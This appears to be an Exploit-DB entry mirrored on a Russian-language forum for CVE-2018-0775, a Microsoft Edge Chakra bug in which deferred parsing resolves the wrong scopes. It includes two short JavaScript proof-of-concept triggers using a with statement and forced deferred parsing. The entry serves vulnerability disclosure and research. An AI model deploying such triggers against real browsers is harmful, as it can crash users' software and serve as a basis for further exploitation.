- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 43717
- Проверка EDB
-
- Пройдено
- Автор
- GOOGLE SECURITY RESEARCH
- Тип уязвимости
- DOS
- Платформа
- WINDOWS
- CVE
- cve-2018-0775
- Дата публикации
- 2018-01-17
Microsoft Edge Chakra - Deferred Parsing Makes Wrong Scopes (2)
Код:
/*
Since the PoC is only triggerable when the "DeferParse" flag enabled and requires a with statement, I think this is simillar to issue 1310 .
PoC:
*/
// Enable the flag using '\n'.repeat(0x1000)
eval(`(function f() {
with ({}) {
(function () {
print(f);
})();
}
}());` + '\n'.repeat(0x1000));
PoC 2:
// ./ch poc.js -ForceDeferParse
(function f() {
with ({}) {
(function () {
print(f);
})();
}
}());- Источник
- www.exploit-db.com
